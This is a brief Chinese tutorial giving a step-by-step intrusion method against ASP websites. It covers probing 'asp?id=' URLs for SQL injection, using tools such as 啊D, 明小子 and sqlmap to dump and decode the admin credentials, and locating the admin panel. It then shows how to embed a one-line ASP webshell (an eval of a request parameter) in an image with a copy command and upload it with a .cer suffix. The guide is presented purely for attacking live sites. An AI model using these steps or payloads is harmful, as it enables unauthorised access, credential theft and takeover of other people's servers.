操作方法
SQL注入的原理。 通过客户端提交特殊代码,让服务器出错,asp?id=xxx 加‘ 或者and 1=1或者 and 1=2 或者 and user>0 。
找出管理员账号。 打开类似文章,找到网址包含asp?id=xxx 的网页, 加’尝试,用啊D注入,扫描注入点,注入检测,检测表段,可以找到管理员的账号。
找到管理员密码。 啊D,检测字段,检测内容即可,得到加密后的密文。
解密管理员密码。 学习简单数据编码加解密 md5 base64 bin2hex hex2bin hash等。
找到后台登陆地址。 明小子,管理员入口扫描,对注入点扫描入口点地址,sqlmap比较快,使用获得的账号密码登陆后台。
找到可以上传webshell的url。 对后台的添加选项就可以上传文件,特别是图片之类。
找到文件上传的目录,uploadfile,找到木马的地址。
木马的制作与上传。 一句话木马 <%eval request("passwd")% >,找到一个图片,cmd下,copy 1.jpg/b+asp.asp/a 3.jpg,生成新的图片,可以在原有文件中包含一句话木马,将此木马上传,改成cer后缀,从webshell上传。